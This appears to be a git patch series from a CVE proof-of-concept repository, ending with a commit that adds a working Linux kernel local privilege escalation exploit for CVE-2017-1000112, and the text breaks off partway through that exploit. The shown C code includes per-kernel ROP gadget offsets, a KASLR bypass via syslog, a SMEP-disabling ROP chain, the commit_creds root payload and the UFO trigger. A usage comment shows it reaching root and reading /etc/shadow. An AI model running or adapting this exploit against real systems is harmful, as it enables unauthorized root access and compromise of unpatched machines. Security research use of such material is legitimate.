- - https://www.exploit-db.com/exploits/50502 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-42325 - cwe-id: CWE-89 - cnvd-id: None - kve-id: None - tags: exploit, remote, code execution, sql injection \ No newline at end of file From 4011482b3ba8aaf83e9c2b1bfa30aba79eaed3fe Mon Sep 17 00:00:00 2001 
From: wangyue Date: Mon, 10 Apr 2023 02:03:56 +0000 Subject: [PATCH 061/109] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20?= =?UTF-8?q?cve/Froxlor/2021/yaml/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2021/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/Froxlor/2021/yaml/.keep diff --git a/cve/Froxlor/2021/yaml/.keep b/cve/Froxlor/2021/yaml/.keep deleted file mode 100644 index e69de29b..00000000 From ecfa45a77fdf3176ddaa33b6e24e0d6512aab484 Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 02:04:12 +0000 Subject: [PATCH 062/109] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20?= =?UTF-8?q?cve/Froxlor/2021/CVE-2021-42325/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2021/CVE-2021-42325/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/Froxlor/2021/CVE-2021-42325/.keep diff --git a/cve/Froxlor/2021/CVE-2021-42325/.keep b/cve/Froxlor/2021/CVE-2021-42325/.keep deleted file mode 100644 index e69de29b..00000000 From 2735baf65f2b3bfda917cd9b23fc4663e1ac732a Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 02:07:42 +0000 Subject: [PATCH 063/109] update cve/Froxlor/2021/yaml/CVE-2021-42325.yaml. Signed-off-by: wangyue --- cve/Froxlor/2021/yaml/CVE-2021-42325.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml b/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml index f39d1ec1..f25a97e3 100644 --- a/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml +++ b/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml @@ -1,6 +1,6 @@ id: CVE-2021-42325 source: - https://github.com/Froxlor/Froxlor/releases/tag/0.10.30 + https://github.com/Froxlor/Froxlor/releases/tag/0.10.30 info: name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。 severity: high 
@@ -12,8 +12,8 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-42325 - https://avd.aliyun.com/detail?id=AVD-2021-42325 - - http://packetstormsecurity.com/files/164800/Froxlor-0.10.29.1-SQL-Injection.html - - https://github.com/Froxlor/Froxlor/commit/eb592340b022298f62a0a3e8450dbfbe29585782 + - http://packetstormsecurity.com/files/164800/Froxlor-0.10.29.1-SQL-Injection.html + - https://github.com/Froxlor/Froxlor/commit/eb592340b022298f62a0a3e8450dbfbe29585782 - https://www.exploit-db.com/exploits/50502 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H From de016a975a05494023b0732c972a1500cc68e350 Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 03:22:07 +0000 Subject: [PATCH 064/109] update cve/Froxlor/2021/yaml/CVE-2021-42325.yaml. Signed-off-by: wangyue --- cve/Froxlor/2021/yaml/CVE-2021-42325.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml b/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml index f25a97e3..1d02f52c 100644 --- a/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml +++ b/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml @@ -1,6 +1,6 @@ id: CVE-2021-42325 source: - https://github.com/Froxlor/Froxlor/releases/tag/0.10.30 + https://github.com/nomi-sec/PoC-in-GitHub/blob/master/2021/CVE-2021-42325.json info: name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。 severity: high From 3a85270017516e90bb6abb75b384a54613a48c84 Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 03:26:24 +0000 Subject: [PATCH 065/109] update cve/Froxlor/2021/yaml/CVE-2021-42325.yaml. Signed-off-by: wangyue --- cve/Froxlor/2021/yaml/CVE-2021-42325.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml b/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml index 1d02f52c..7cd4ff5e 100644 --- a/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml +++ b/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml 
@@ -1,6 +1,6 @@ id: CVE-2021-42325 source: - https://github.com/nomi-sec/PoC-in-GitHub/blob/master/2021/CVE-2021-42325.json + https://www.exploit-db.com/exploits/50502 info: name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。 severity: high @@ -14,7 +14,6 @@ info: - https://avd.aliyun.com/detail?id=AVD-2021-42325 - http://packetstormsecurity.com/files/164800/Froxlor-0.10.29.1-SQL-Injection.html - https://github.com/Froxlor/Froxlor/commit/eb592340b022298f62a0a3e8450dbfbe29585782 - - https://www.exploit-db.com/exploits/50502 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 From a5bed1a013779fa68e07a11b7e2735bd17363baa Mon Sep 17 00:00:00 2001 From: zhangqianyun Date: Fri, 7 Apr 2023 18:04:34 +0800 Subject: [PATCH 066/109] Add CVE-2017-1000112 --- .../2017/CVE-2017-1000112/README.md | 5 + cve/linux-kernel/2017/CVE-2017-1000112/poc.c | 668 ++++++++++++++++++ .../2017/yaml/CVE-2017-1000112.yaml | 20 + openkylin_list.yaml | 1 + 4 files changed, 694 insertions(+) create mode 100644 cve/linux-kernel/2017/CVE-2017-1000112/README.md create mode 100644 cve/linux-kernel/2017/CVE-2017-1000112/poc.c create mode 100644 cve/linux-kernel/2017/yaml/CVE-2017-1000112.yaml diff --git a/cve/linux-kernel/2017/CVE-2017-1000112/README.md b/cve/linux-kernel/2017/CVE-2017-1000112/README.md new file mode 100644 index 00000000..7299a9af --- /dev/null +++ b/cve/linux-kernel/2017/CVE-2017-1000112/README.md @@ -0,0 +1,5 @@ +CVE-2017-1000112 +================ + +This is a proof-of-concept Local Privelege Escalation exploit for [CVE-2017-1000112](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000112) — a memory corruption vulnerability I found in the UDP Fragmentation Offload feature of the Linux kernel IP sockets. +See the details in [CVE-2017-1000112: Exploiting an out-of-bounds bug in the Linux kernel UFO packets](https://xairy.io/articles/2017/cve-2017-1000112). 
diff --git a/cve/linux-kernel/2017/CVE-2017-1000112/poc.c b/cve/linux-kernel/2017/CVE-2017-1000112/poc.c new file mode 100644 index 00000000..94732769 --- /dev/null +++ b/cve/linux-kernel/2017/CVE-2017-1000112/poc.c 
@@ -0,0 +1,668 @@ +// A proof-of-concept local root exploit for CVE-2017-1000112. +// Includes KASLR and SMEP bypasses. No SMAP bypass. +// Tested on Ubuntu trusty 4.4.0-* and Ubuntu xenial 4-8-0-* kernels. +// +// Usage: +// user@ubuntu:~$ uname -a +// Linux ubuntu 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux +// user@ubuntu:~$ whoami +// user +// user@ubuntu:~$ id +// uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare) +// user@ubuntu:~$ gcc pwn.c -o pwn +// user@ubuntu:~$ ./pwn +// [.] starting +// [.] checking distro and kernel versions +// [.] kernel version '4.8.0-58-generic' detected +// [~] done, versions looks good +// [.] checking SMEP and SMAP +// [~] done, looks good +// [.] setting up namespace sandbox +// [~] done, namespace sandbox set up +// [.] KASLR bypass enabled, getting kernel addr +// [~] done, kernel text: ffffffffae400000 +// [.] commit_creds: ffffffffae4a5d20 +// [.] prepare_kernel_cred: ffffffffae4a6110 +// [.] SMEP bypass enabled, mmapping fake stack +// [~] done, fake stack mmapped +// [.] executing payload ffffffffae40008d +// [~] done, should be root now +// [.] checking if we got root +// [+] got r00t ^_^ +// root@ubuntu:/home/user# whoami +// root +// root@ubuntu:/home/user# id +// uid=0(root) gid=0(root) groups=0(root) +// root@ubuntu:/home/user# cat /etc/shadow +// root:!:17246:0:99999:7::: +// daemon:*:17212:0:99999:7::: +// bin:*:17212:0:99999:7::: +// sys:*:17212:0:99999:7::: +// ... +// +// Andrey Konovalov + +#define _GNU_SOURCE + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include +#include +#include +#include +#include + +#define ENABLE_KASLR_BYPASS 1 +#define ENABLE_SMEP_BYPASS 1 + +// Will be overwritten if ENABLE_KASLR_BYPASS is enabled. 
+unsigned long KERNEL_BASE = 0xffffffff81000000ul; + +// Will be overwritten by detect_versions(). +int kernel = -1; + +struct kernel_info { + const char* distro; + const char* version; + uint64_t commit_creds; + uint64_t prepare_kernel_cred; + uint64_t xchg_eax_esp_ret; + uint64_t pop_rdi_ret; + uint64_t mov_dword_ptr_rdi_eax_ret; + uint64_t mov_rax_cr4_ret; + uint64_t neg_rax_ret; + uint64_t pop_rcx_ret; + uint64_t or_rax_rcx_ret; + uint64_t xchg_eax_edi_ret; + uint64_t mov_cr4_rdi_ret; + uint64_t jmp_rcx; +}; + +struct kernel_info kernels[] = { + { "trusty", "4.4.0-21-generic", 0x9d7a0, 0x9da80, 0x4520a, 0x30f75, 0x109957, 0x1a7a0, 0x3d6b7a, 0x1cbfc, 0x76453, 0x49d4d, 0x61300, 0x1b91d }, + { "trusty", "4.4.0-22-generic", 0x9d7e0, 0x9dac0, 0x4521a, 0x28c19d, 0x1099b7, 0x1a7f0, 0x3d781a, 0x1cc4c, 0x764b3, 0x49d5d, 0x61300, 0x48040 }, + { "trusty", "4.4.0-24-generic", 0x9d5f0, 0x9d8d0, 0x4516a, 0x1026cd, 0x107757, 0x1a810, 0x3d7a9a, 0x1cc6c, 0x763b3, 0x49cbd, 0x612f0, 0x47fa0 }, + { "trusty", "4.4.0-28-generic", 0x9d760, 0x9da40, 0x4516a, 0x3dc58f, 0x1079a7, 0x1a830, 0x3d801a, 0x1cc8c, 0x763b3, 0x49cbd, 0x612f0, 0x47fa0 }, + { "trusty", "4.4.0-31-generic", 0x9d760, 0x9da40, 0x4516a, 0x3e223f, 0x1079a7, 0x1a830, 0x3ddcca, 0x1cc8c, 0x763b3, 0x49cbd, 0x612f0, 0x47fa0 }, + { "trusty", "4.4.0-34-generic", 0x9d760, 0x9da40, 0x4510a, 0x355689, 0x1079a7, 0x1a830, 0x3ddd1a, 0x1cc8c, 0x763b3, 0x49c5d, 0x612f0, 0x47f40 }, + { "trusty", "4.4.0-36-generic", 0x9d770, 0x9da50, 0x4510a, 0x1eec9d, 0x107a47, 0x1a830, 0x3de02a, 0x1cc8c, 0x763c3, 0x29595, 0x61300, 0x47f40 }, + { "trusty", "4.4.0-38-generic", 0x9d820, 0x9db00, 0x4510a, 0x598fd, 0x107af7, 0x1a820, 0x3de8ca, 0x1cc7c, 0x76473, 0x49c5d, 0x61300, 0x1a77b }, + { "trusty", "4.4.0-42-generic", 0x9d870, 0x9db50, 0x4510a, 0x5f13d, 0x107b17, 0x1a820, 0x3deb7a, 0x1cc7c, 0x76463, 0x49c5d, 0x61300, 0x1a77b }, + { "trusty", "4.4.0-45-generic", 0x9d870, 0x9db50, 0x4510a, 0x5f13d, 0x107b17, 0x1a820, 0x3debda, 0x1cc7c, 0x76463, 0x49c5d, 
0x61300, 0x1a77b }, + { "trusty", "4.4.0-47-generic", 0x9d940, 0x9dc20, 0x4511a, 0x171f8d, 0x107bd7, 0x1a820, 0x3e241a, 0x1cc7c, 0x76463, 0x299f5, 0x61300, 0x1a77b }, + { "trusty", "4.4.0-51-generic", 0x9d920, 0x9dc00, 0x4511a, 0x21f15c, 0x107c77, 0x1a820, 0x3e280a, 0x1cc7c, 0x76463, 0x49c6d, 0x61300, 0x1a77b }, + { "trusty", "4.4.0-53-generic", 0x9d920, 0x9dc00, 0x4511a, 0x21f15c, 0x107c77, 0x1a820, 0x3e280a, 0x1cc7c, 0x76463, 0x49c6d, 0x61300, 0x1a77b }, + { "trusty", "4.4.0-57-generic", 0x9ebb0, 0x9ee90, 0x4518a, 0x39401d, 0x1097d7, 0x1a820, 0x3e527a, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b }, + { "trusty", "4.4.0-59-generic", 0x9ebb0, 0x9ee90, 0x4518a, 0x2dbc4e, 0x1097d7, 0x1a820, 0x3e571a, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b }, + { "trusty", "4.4.0-62-generic", 0x9ebe0, 0x9eec0, 0x4518a, 0x3ea46f, 0x109837, 0x1a820, 0x3e5e5a, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b }, + { "trusty", "4.4.0-63-generic", 0x9ebe0, 0x9eec0, 0x4518a, 0x2e2e7d, 0x109847, 0x1a820, 0x3e61ba, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b }, + { "trusty", "4.4.0-64-generic", 0x9ebe0, 0x9eec0, 0x4518a, 0x2e2e7d, 0x109847, 0x1a820, 0x3e61ba, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b }, + { "trusty", "4.4.0-66-generic", 0x9ebe0, 0x9eec0, 0x4518a, 0x2e2e7d, 0x109847, 0x1a820, 0x3e61ba, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b }, + { "trusty", "4.4.0-67-generic", 0x9eb60, 0x9ee40, 0x4518a, 0x12a9dc, 0x109887, 0x1a820, 0x3e67ba, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b }, + { "trusty", "4.4.0-70-generic", 0x9eb60, 0x9ee40, 0x4518a, 0xd61a2, 0x109887, 0x1a820, 0x3e63ca, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b }, + { "trusty", "4.4.0-71-generic", 0x9eb60, 0x9ee40, 0x4518a, 0xd61a2, 0x109887, 0x1a820, 0x3e63ca, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b }, + { "trusty", "4.4.0-72-generic", 0x9eb60, 0x9ee40, 0x4518a, 0xd61a2, 0x109887, 0x1a820, 0x3e63ca, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b }, + { "trusty", "4.4.0-75-generic", 0x9eb60, 0x9ee40, 0x4518a, 0x303cfd, 
0x1098a7, 0x1a820, 0x3e67ea, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b }, + { "trusty", "4.4.0-78-generic", 0x9eb70, 0x9ee50, 0x4518a, 0x30366d, 0x1098b7, 0x1a820, 0x3e710a, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b }, + { "trusty", "4.4.0-79-generic", 0x9ebb0, 0x9ee90, 0x4518a, 0x3ebdcf, 0x1099a7, 0x1a830, 0x3e77ba, 0x1cc8c, 0x774e3, 0x49cdd, 0x62330, 0x1a78b }, + { "trusty", "4.4.0-81-generic", 0x9ebb0, 0x9ee90, 0x4518a, 0x2dc688, 0x1099a7, 0x1a830, 0x3e789a, 0x1cc8c, 0x774e3, 0x24487, 0x62330, 0x1a78b }, + { "trusty", "4.4.0-83-generic", 0x9ebc0, 0x9eea0, 0x451ca, 0x2dc6f5, 0x1099b7, 0x1a830, 0x3e78fa, 0x1cc8c, 0x77533, 0x49d1d, 0x62360, 0x1a78b }, + { "xenial", "4.8.0-34-generic", 0xa5d50, 0xa6140, 0x17d15, 0x6854d, 0x119227, 0x1b230, 0x4390da, 0x206c23, 0x7bcf3, 0x12c7f7, 0x64210, 0x49f80 }, + { "xenial", "4.8.0-36-generic", 0xa5d50, 0xa6140, 0x17d15, 0x6854d, 0x119227, 0x1b230, 0x4390da, 0x206c23, 0x7bcf3, 0x12c7f7, 0x64210, 0x49f80 }, + { "xenial", "4.8.0-39-generic", 0xa5cf0, 0xa60e0, 0x17c55, 0xf3980, 0x1191f7, 0x1b170, 0x43996a, 0x2e8363, 0x7bcf3, 0x12c7c7, 0x64210, 0x49f60 }, + { "xenial", "4.8.0-41-generic", 0xa5cf0, 0xa60e0, 0x17c55, 0xf3980, 0x1191f7, 0x1b170, 0x43996a, 0x2e8363, 0x7bcf3, 0x12c7c7, 0x64210, 0x49f60 }, + { "xenial", "4.8.0-45-generic", 0xa5cf0, 0xa60e0, 0x17c55, 0x100935, 0x1191f7, 0x1b170, 0x43999a, 0x185493, 0x7bcf3, 0xdfc5, 0x64210, 0x49f60 }, + { "xenial", "4.8.0-46-generic", 0xa5cf0, 0xa60e0, 0x17c55, 0x100935, 0x1191f7, 0x1b170, 0x43999a, 0x185493, 0x7bcf3, 0x12c7c7, 0x64210, 0x49f60 }, + { "xenial", "4.8.0-49-generic", 0xa5d00, 0xa60f0, 0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x439bba, 0x102e33, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 }, + { "xenial", "4.8.0-52-generic", 0xa5d00, 0xa60f0, 0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x43a0da, 0x63e843, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 }, + { "xenial", "4.8.0-54-generic", 0xa5d00, 0xa60f0, 0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x43a0da, 0x5ada3c, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 }, 
+ { "xenial", "4.8.0-56-generic", 0xa5d00, 0xa60f0, 0x17c55, 0x39d50d, 0x119207, 0x1b170, 0x43a14a, 0x44d4a0, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 }, + { "xenial", "4.8.0-58-generic", 0xa5d20, 0xa6110, 0x17c55, 0xe56f5, 0x119227, 0x1b170, 0x439e7a, 0x162622, 0x7bd23, 0x12c7f7, 0x64210, 0x49fa0 }, +}; + +// Used to get root privileges. +#define COMMIT_CREDS (KERNEL_BASE + kernels[kernel].commit_creds) +#define PREPARE_KERNEL_CRED (KERNEL_BASE + kernels[kernel].prepare_kernel_cred) + +// Used when ENABLE_SMEP_BYPASS is used. +// - xchg eax, esp ; ret +// - pop rdi ; ret +// - mov dword ptr [rdi], eax ; ret +// - push rbp ; mov rbp, rsp ; mov rax, cr4 ; pop rbp ; ret +// - neg rax ; ret +// - pop rcx ; ret +// - or rax, rcx ; ret +// - xchg eax, edi ; ret +// - push rbp ; mov rbp, rsp ; mov cr4, rdi ; pop rbp ; ret +// - jmp rcx +#define XCHG_EAX_ESP_RET (KERNEL_BASE + kernels[kernel].xchg_eax_esp_ret) +#define POP_RDI_RET (KERNEL_BASE + kernels[kernel].pop_rdi_ret) +#define MOV_DWORD_PTR_RDI_EAX_RET (KERNEL_BASE + kernels[kernel].mov_dword_ptr_rdi_eax_ret) +#define MOV_RAX_CR4_RET (KERNEL_BASE + kernels[kernel].mov_rax_cr4_ret) +#define NEG_RAX_RET (KERNEL_BASE + kernels[kernel].neg_rax_ret) +#define POP_RCX_RET (KERNEL_BASE + kernels[kernel].pop_rcx_ret) +#define OR_RAX_RCX_RET (KERNEL_BASE + kernels[kernel].or_rax_rcx_ret) +#define XCHG_EAX_EDI_RET (KERNEL_BASE + kernels[kernel].xchg_eax_edi_ret) +#define MOV_CR4_RDI_RET (KERNEL_BASE + kernels[kernel].mov_cr4_rdi_ret) +#define JMP_RCX (KERNEL_BASE + kernels[kernel].jmp_rcx) + +// * * * * * * * * * * * * * * * Getting root * * * * * * * * * * * * * * * * + +typedef unsigned long __attribute__((regparm(3))) (*_commit_creds)(unsigned long cred); +typedef unsigned long __attribute__((regparm(3))) (*_prepare_kernel_cred)(unsigned long cred); + +void get_root(void) { + ((_commit_creds)(COMMIT_CREDS))( + ((_prepare_kernel_cred)(PREPARE_KERNEL_CRED))(0)); +} + +// * * * * * * * * * * * * * * * * SMEP bypass * * * * * * * * 
* * * * * * * * + +uint64_t saved_esp; + +// Unfortunately GCC does not support `__atribute__((naked))` on x86, which +// can be used to omit a function's prologue, so I had to use this weird +// wrapper hack as a workaround. Note: Clang does support it, which means it +// has better support of GCC attributes than GCC itself. Funny. +void wrapper() { + asm volatile (" \n\ + payload: \n\ + movq %%rbp, %%rax \n\ + movq $0xffffffff00000000, %%rdx \n\ + andq %%rdx, %%rax \n\ + movq %0, %%rdx \n\ + addq %%rdx, %%rax \n\ + movq %%rax, %%rsp \n\ + call get_root \n\ + ret \n\ + " : : "m"(saved_esp) : ); +} + +void payload(); + +#define CHAIN_SAVE_ESP \ + *stack++ = POP_RDI_RET; \ + *stack++ = (uint64_t)&saved_esp; \ + *stack++ = MOV_DWORD_PTR_RDI_EAX_RET; + +#define SMEP_MASK 0x100000 + +#define CHAIN_DISABLE_SMEP \ + *stack++ = MOV_RAX_CR4_RET; \ + *stack++ = NEG_RAX_RET; \ + *stack++ = POP_RCX_RET; \ + *stack++ = SMEP_MASK; \ + *stack++ = OR_RAX_RCX_RET; \ + *stack++ = NEG_RAX_RET; \ + *stack++ = XCHG_EAX_EDI_RET; \ + *stack++ = MOV_CR4_RDI_RET; + +#define CHAIN_JMP_PAYLOAD \ + *stack++ = POP_RCX_RET; \ + *stack++ = (uint64_t)&payload; \ + *stack++ = JMP_RCX; + +void mmap_stack() { + uint64_t stack_aligned, stack_addr; + int page_size, stack_size, stack_offset; + uint64_t* stack; + + page_size = getpagesize(); + + stack_aligned = (XCHG_EAX_ESP_RET & 0x00000000fffffffful) & ~(page_size - 1); + stack_addr = stack_aligned - page_size * 4; + stack_size = page_size * 8; + stack_offset = XCHG_EAX_ESP_RET % page_size; + + stack = mmap((void*)stack_addr, stack_size, PROT_READ | PROT_WRITE, + MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0); + if (stack == MAP_FAILED || stack != (void*)stack_addr) { + perror("[-] mmap()"); + exit(EXIT_FAILURE); + } + + stack = (uint64_t*)((char*)stack_aligned + stack_offset); + + CHAIN_SAVE_ESP; + CHAIN_DISABLE_SMEP; + CHAIN_JMP_PAYLOAD; +} + +// * * * * * * * * * * * * * * syslog KASLR bypass * * * * * * * * * * * * * * + +#define 
SYSLOG_ACTION_READ_ALL 3 +#define SYSLOG_ACTION_SIZE_BUFFER 10 + +void mmap_syslog(char** buffer, int* size) { + *size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0); + if (*size == -1) { + perror("[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)"); + exit(EXIT_FAILURE); + } + + *size = (*size / getpagesize() + 1) * getpagesize(); + *buffer = (char*)mmap(NULL, *size, PROT_READ | PROT_WRITE, + MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); + + *size = klogctl(SYSLOG_ACTION_READ_ALL, &((*buffer)[0]), *size); + if (*size == -1) { + perror("[-] klogctl(SYSLOG_ACTION_READ_ALL)"); + exit(EXIT_FAILURE); + } +} + +unsigned long get_kernel_addr_trusty(char* buffer, int size) { + const char* needle1 = "Freeing unused"; + char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1)); + if (substr == NULL) { + fprintf(stderr, "[-] substring '%s' not found in syslog\n", needle1); + exit(EXIT_FAILURE); + } + + int start = 0; + int end = 0; + for (end = start; substr[end] != '-'; end++); + + const char* needle2 = "ffffff"; + substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2)); + if (substr == NULL) { + fprintf(stderr, "[-] substring '%s' not found in syslog\n", needle2); + exit(EXIT_FAILURE); + } + + char* endptr = &substr[16]; + unsigned long r = strtoul(&substr[0], &endptr, 16); + + r &= 0xffffffffff000000ul; + + return r; +} + +unsigned long get_kernel_addr_xenial(char* buffer, int size) { + const char* needle1 = "Freeing unused"; + char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1)); + if (substr == NULL) { + fprintf(stderr, "[-] substring '%s' not found in syslog\n", needle1); + exit(EXIT_FAILURE); + } + + int start = 0; + int end = 0; + for (start = 0; substr[start] != '-'; start++); + for (end = start; substr[end] != '\n'; end++); + + const char* needle2 = "ffffff"; + substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2)); + if (substr == NULL) { + fprintf(stderr, "[-] substring '%s' not found in syslog\n", needle2); 
+ exit(EXIT_FAILURE); + } + + char* endptr = &substr[16]; + unsigned long r = strtoul(&substr[0], &endptr, 16); + + r &= 0xfffffffffff00000ul; + r -= 0x1000000ul; + + return r; +} + +unsigned long get_kernel_addr() { + char* syslog; + int size; + mmap_syslog(&syslog, &size); + + if (strcmp("trusty", kernels[kernel].distro) == 0 && + strncmp("4.4.0", kernels[kernel].version, 5) == 0) + return get_kernel_addr_trusty(syslog, size); + if (strcmp("xenial", kernels[kernel].distro) == 0 && + strncmp("4.8.0", kernels[kernel].version, 5) == 0) + return get_kernel_addr_xenial(syslog, size); + + printf("[-] KASLR bypass only tested on trusty 4.4.0-* and xenial 4-8-0-*"); + exit(EXIT_FAILURE); +} + +// * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * * + +struct ubuf_info { + uint64_t callback; // void (*callback)(struct ubuf_info *, bool) + uint64_t ctx; // void * + uint64_t desc; // unsigned long +}; + +struct skb_shared_info { + uint8_t nr_frags; // unsigned char + uint8_t tx_flags; // __u8 + uint16_t gso_size; // unsigned short + uint16_t gso_segs; // unsigned short + uint16_t gso_type; // unsigned short + uint64_t frag_list; // struct sk_buff * + uint64_t hwtstamps; // struct skb_shared_hwtstamps + uint32_t tskey; // u32 + uint32_t ip6_frag_id; // __be32 + uint32_t dataref; // atomic_t + uint64_t destructor_arg; // void * + uint8_t frags[16][17]; // skb_frag_t frags[MAX_SKB_FRAGS]; +}; + +struct ubuf_info ui; + +void init_skb_buffer(char* buffer, unsigned long func) { + struct skb_shared_info* ssi = (struct skb_shared_info*)buffer; + memset(ssi, 0, sizeof(*ssi)); + + ssi->tx_flags = 0xff; + ssi->destructor_arg = (uint64_t)&ui; + ssi->nr_frags = 0; + ssi->frag_list = 0; + + ui.callback = func; +} + +// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * * + +#define SHINFO_OFFSET 3164 + +void oob_execute(unsigned long payload) { + char buffer[4096]; + memset(&buffer[0], 0x42, 4096); + init_skb_buffer(&buffer[SHINFO_OFFSET], 
payload); + + int s = socket(PF_INET, SOCK_DGRAM, 0); + if (s == -1) { + perror("[-] socket()"); + exit(EXIT_FAILURE); + } + + struct sockaddr_in addr; + memset(&addr, 0, sizeof(addr)); + addr.sin_family = AF_INET; + addr.sin_port = htons(8000); + addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK); + + if (connect(s, (void*)&addr, sizeof(addr))) { + perror("[-] connect()"); + exit(EXIT_FAILURE); + } + + int size = SHINFO_OFFSET + sizeof(struct skb_shared_info); + int rv = send(s, buffer, size, MSG_MORE); + if (rv != size) { + perror("[-] send()"); + exit(EXIT_FAILURE); + } + + int val = 1; + rv = setsockopt(s, SOL_SOCKET, SO_NO_CHECK, &val, sizeof(val)); + if (rv != 0) { + perror("[-] setsockopt(SO_NO_CHECK)"); + exit(EXIT_FAILURE); + } + + send(s, buffer, 1, 0); + + close(s); +} + +// * * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * * * + +#define CHUNK_SIZE 1024 + +int read_file(const char* file, char* buffer, int max_length) { + int f = open(file, O_RDONLY); + if (f == -1) + return -1; + int bytes_read = 0; + while (true) { + int bytes_to_read = CHUNK_SIZE; + if (bytes_to_read > max_length - bytes_read) + bytes_to_read = max_length - bytes_read; + int rv = read(f, &buffer[bytes_read], bytes_to_read); + if (rv == -1) + return -1; + bytes_read += rv; + if (rv == 0) + return bytes_read; + } +} + +#define LSB_RELEASE_LENGTH 1024 + +void get_distro_codename(char* output, int max_length) { + char buffer[LSB_RELEASE_LENGTH]; + int length = read_file("/etc/lsb-release", &buffer[0], LSB_RELEASE_LENGTH); + if (length == -1) { + perror("[-] open/read(/etc/lsb-release)"); + exit(EXIT_FAILURE); + } + const char *needle = "DISTRIB_CODENAME="; + int needle_length = strlen(needle); + char* found = memmem(&buffer[0], length, needle, needle_length); + if (found == NULL) { + printf("[-] couldn't find DISTRIB_CODENAME in /etc/lsb-release\n"); + exit(EXIT_FAILURE); + } + int i; + for (i = 0; found[needle_length + i] != '\n'; i++) { + assert(i < max_length); + 
